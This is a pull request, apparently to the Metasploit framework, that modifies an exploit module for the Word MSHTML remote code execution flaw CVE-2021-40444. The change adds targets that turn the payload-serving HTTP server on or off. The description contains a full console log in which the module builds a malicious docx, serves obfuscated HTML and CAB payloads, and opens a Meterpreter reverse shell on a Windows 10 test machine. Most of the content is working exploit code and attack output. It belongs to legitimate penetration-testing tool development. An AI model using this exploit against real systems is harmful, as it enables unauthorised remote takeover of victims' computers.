### PR TITLE
Toggle HTTP server

### DIFF
--- a/modules/exploits/windows/fileformat/word_mshtml_rce.rb
+++ b/modules/exploits/windows/fileformat/word_mshtml_rce.rb
@@ -37,17 +37,32 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Privileged' => false,
         'Platform' => 'win',
-        'Arch' => [ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_X64],
         'Payload' => {
           'DisableNops' => true
         },
         'DefaultOptions' => {
-          'DisablePayloadHandler' => false,
-          'FILENAME' => 'msf.docx',
-          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+          'FILENAME' => 'msf.docx'
         },
         'Targets' => [
-          [ 'Microsoft Office Word', {} ]
+          [
+            'Hosted',
+            {
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Not_Hosted',
+            {
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'PAYLOAD' => 'generic/custom'
+              }
+            }
+          ]
         ],
         'DefaultTarget' => 0,
         'Notes' => {
@@ -173,6 +188,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # CFDATA
     cab_stream << cab_cfdata
+  end
+
+  def exploit
+    print_status("target.name = #{target.name}")
+    if target.name == 'Hosted'
+      vprint_status('Setting up HTTP server')
+      super
+    else
+      primer
+    end
   end
 
   def generate_html
@@ -345,7 +370,5 @@ class MetasploitModule < Msf::Exploit::Remote
         platform: 'win'
       }
     )
-
-    super
   end
 end


### PR DESCRIPTION
This gets the job done toggling control over the http server, but it has some odd output.  I don't know why it says it is failing at first, then works fine 😆 .  At least it is a start, as it does appear to give you control over the HTTP server.  Shoutout to @smcintyre-r7 for reminding me that namespace collisions are a _feature_ of Ruby.

```
msf6 exploit(windows/fileformat/word_mshtml_rce) > set verbose true
verbose => true
msf6 exploit(windows/fileformat/word_mshtml_rce) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] target.name = Hosted
[*] Setting up HTTP server
[*] Using URL: http://10.5.135.101:8080/VSsjQ5taeopSzE1
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
msf6 exploit(windows/fileformat/word_mshtml_rce) > [*] Parsing item from template: [Content_Types].xml
[*] Parsing item from template: _rels/
[*] Parsing item from template: _rels/.rels
[*] Parsing item from template: docProps/
[*] Parsing item from template: docProps/core.xml
[*] Parsing item from template: docProps/app.xml
[*] Parsing item from template: word/
[*] Parsing item from template: word/theme/
[*] Parsing item from template: word/theme/theme1.xml
[*] Parsing item from template: word/styles.xml
[*] Parsing item from template: word/settings.xml
[*] Parsing item from template: word/document.xml
[*] Parsing item from template: word/_rels/
[*] Parsing item from template: word/_rels/document.xml.rels
[*] Parsing item from template: word/fontTable.xml
[*] Parsing item from template: word/webSettings.xml
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 687dde2c
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 687dde2c
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] Sending stage (200262 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:51001) at 2021-11-17 07:52:07 -0600

msf6 exploit(windows/fileformat/word_mshtml_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.101 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(windows/fileformat/word_mshtml_rce) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf6 exploit(windows/fileformat/word_mshtml_rce) > set target Not_Hosted 
target => Not_Hosted
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 9.
msf6 exploit(windows/fileformat/word_mshtml_rce) > 
[*] target.name = Not_Hosted
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Parsing item from template: [Content_Types].xml
[*] Parsing item from template: _rels/
[*] Parsing item from template: _rels/.rels
[*] Parsing item from template: docProps/
[*] Parsing item from template: docProps/core.xml
[*] Parsing item from template: docProps/app.xml
[*] Parsing item from template: word/
[*] Parsing item from template: word/theme/
[*] Parsing item from template: word/theme/theme1.xml
[*] Parsing item from template: word/styles.xml
[*] Parsing item from template: word/settings.xml
[*] Parsing item from template: word/document.xml
[*] Parsing item from template: word/_rels/
[*] Parsing item from template: word/_rels/document.xml.rels
[*] Parsing item from template: word/fontTable.xml
[*] Parsing item from template: word/webSettings.xml
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx

msf6 exploit(windows/fileformat/word_mshtml_rce) > jobs -l

Jobs
====

No active jobs.

msf6 exploit(windows/fileformat/word_mshtml_rce) > exit

```